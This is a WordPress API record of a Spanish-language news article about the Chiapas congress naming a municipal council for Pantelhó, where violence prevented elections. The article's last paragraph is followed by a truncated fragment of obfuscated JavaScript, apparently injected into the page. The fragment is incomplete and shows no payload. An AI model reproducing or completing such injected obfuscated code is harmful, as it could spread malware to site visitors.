{"id":18135,"date":"2024-10-01T02:08:50","date_gmt":"2024-10-01T02:08:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18135"},"modified":"2024-10-01T02:08:51","modified_gmt":"2024-10-01T02:08:51","slug":"nombran-concejo-para-pantelho-podria-no-ejercer-funciones","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18135","title":{"rendered":"Nombran concejo para Pantelh\u00f3, podr\u00eda no ejercer funciones"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"479\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1727748439167.jpg\" alt=\"\" class=\"wp-image-18136\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1727748439167.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1727748439167-300x187.jpg 300w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Miguel Mart\u00ednez<\/p>\n\n\n\n<p>30 de septiembre del 2024. &#8211; Al cierre de la LXVIII legislatura del Congreso del Estado se llev\u00f3 a cabo el nombramiento del Concejo Municipal de Pantelh\u00f3, en donde no se pudo llevar a cabo elecciones en este 2024 por falta de condiciones de seguridad.<\/p>\n\n\n\n<p>Durante la Sesi\u00f3n Extraordinaria, la Comisi\u00f3n Permanente del Congreso del Estado, llev\u00f3 a cabo este acto, luego de recibir oficio del Instituto de Elecciones y Participaci\u00f3n Ciudadana, con la notificaci\u00f3n de la baja total de casillas en este municipio, durante las elecciones extraordinarias del 24 de agosto.<\/p>\n\n\n\n<p>Pantelh\u00f3 fue uno de los tres municipios que no celebr\u00f3 el proceso local ordinario y el \u00fanico que no llev\u00f3 a cabo la votaci\u00f3n extraordinaria.<\/p>\n\n\n\n<p>Sonia Catalina \u00c1lvarez, presidenta de la Mesa Directiva del Congreso del Estado, coment\u00f3 que para evitar un vac\u00edo de poder en este municipio, donde por cuestiones de violencia no se pudo realizar la votaci\u00f3n se nombr\u00f3 este Concejo Municipal con vigencia del primero de octubre al 30 de septiembre del 2027.<\/p>\n\n\n\n<p>En este contexto agreg\u00f3 que: \u201cHemos nombrado un Concejo Municipal en Pantelh\u00f3 Chiapas, que entrar\u00e1 en ejercicios de funciones el primero de octubre de 2024 y concluir\u00e1 el 30 de septiembre de 2027\u201d.<\/p>\n\n\n\n<p>Este Concejo Municipal, qued\u00f3 conformado de la siguiente manera: Concejal Presidente: Juan G\u00f3mez Santiz, Concejal S\u00edndica: Martha Trejo Hern\u00e1ndez, Concejal Regidor : Alberto Gonz\u00e1lez Santiz, Concejal Regidora: Rebeca Cortes Hern\u00e1ndez, Concejal Regidor: Rub\u00e9n Herrera Guti\u00e9rrez.<\/p>\n\n\n\n<p>Una vez llevado a cabo el nombramiento, se espera que, en las pr\u00f3ximas horas este Concejo Municipal toma protesta, y existe incertidumbre de que, las y los habitantes de Pantelh\u00f3 permitan que pueda gobernar ya que, ha sido un municipio donde prevalece la violencia y presencia de grupos armados.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Miguel Mart\u00ednez 30 de septiembre del 2024. &#8211; Al cierre de la LXVIII legislatura del Congreso del Estado se llev\u00f3 a cabo el nombramiento del Concejo Municipal de Pantelh\u00f3, en donde no se pudo llevar a cabo elecciones en este 2024 por falta de condiciones de seguridad. Durante la Sesi\u00f3n Extraordinaria, la Comisi\u00f3n Permanente del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18136,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18135","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18135","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18135"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18135\/revisions"}],"predecessor-version":[{"id":18137,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18135\/revisions\/18137"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18136"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18135"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18135"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18135"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}